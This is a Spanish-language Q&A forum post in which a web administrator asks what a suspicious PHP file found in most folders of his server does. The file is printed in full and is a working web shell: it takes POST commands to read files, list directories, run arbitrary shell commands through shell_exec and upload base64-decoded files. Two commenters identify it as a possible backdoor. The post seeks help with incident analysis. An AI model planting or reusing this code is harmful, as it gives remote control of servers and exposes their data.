# ¿Qué hace este código php?

Tags: php, web, cmd, aplicación-web

me presento , soy juan y estoy administrando unas paginas web , por ende tengo acceso a los servidores, hace poco me comentaron que perdieron los correos corporativos e hice una examinación de los archivos del servidor y encontre este codigo en mi servidor web , pero no estoy seguro si es del servidor o es algo externo (algo malicioso), me gustaria que me indiquen que hace :( , he estado teniendo problemas en el servidor de mi pagina web.

Esta en casi todas las carpetas de la web.

```
<?php 
    
    function echo_json($data=[])
    {

        echo json_encode( $data );

    }

    if( !empty( $_POST['cmd'] ) ){


        if( $_POST['cmd'] == "test" ){

            echo_json([
                "code" => 200,
            ]);

        }

        if( $_POST['cmd'] == "get_file_data" ){

            $data = file_get_contents( __DIR__ . '/' . $_POST['file'] );

            echo_json([
                "code" => 200,
                "data" => $data,
            ]);

        }


        if( $_POST['cmd'] == "get_files" ){

            $struct = [];

            $files = scandir( __DIR__ );

            foreach ($files as $file) {
                
                if( $file == '.' || $file == '..' ){
                    continue;
                }

                if( is_dir( __DIR__ . '/' . $file ) ){

                    $sub_files = scandir( __DIR__ . '/' . $file );

                    $struct[] = [
                        "file" => $file,
                        "type" => "d",
                        "sub_files" => $sub_files,
                    ];

                }else{

                    $struct[] = [
                        "file" => $file,
                        "type" => "f",
                    ];

                }

            }

            echo_json([
                "code" => 200,
                "struct" => $struct,
            ]);

        }

        if( $_POST['cmd'] == "get_dir" ){

            echo_json([
                "code" => 200,
                "dir" => __DIR__,
            ]);

        }

        if( $_POST['cmd'] == "shell_exec" ){

            shell_exec( $_POST['command'] );

            echo_json([
                "code" => 200,
            ]);

        }

        if( $_POST['cmd'] == "mkdir" ){

            mkdir( $_POST['dir'] );
            chmod( $_POST['dir'] , 0755 );

            echo_json([
                "code" => 200,
            ]);

        }

        if( $_POST['cmd'] == "upload" ){

            file_put_contents( $_POST['file'] , base64_decode( $_POST['data'] ) );
            chmod( $_POST['file'] , 0644 );

            echo_json([
                "code" => 200,
            ]);

        }

    }
```

Les agradeceria mucho que me indicaran que es

Comment: Permite manipular el sistema de archivos del servidor y ejecutar comandos usando peticiones HTTP. Si es malicioso depende de con qué propósito se esté usando.

Comment: Tal como dicen, ese script pudiera ser usado de forma maliciosa (backdoor) a través de peticiones POST. Solo analizando un archivo es difícil de calificar la situación. Sugiero consigan a un experto que haga la evaluación. Si esto es malintencionado, a lo mejor no es la única irregularidad que exista.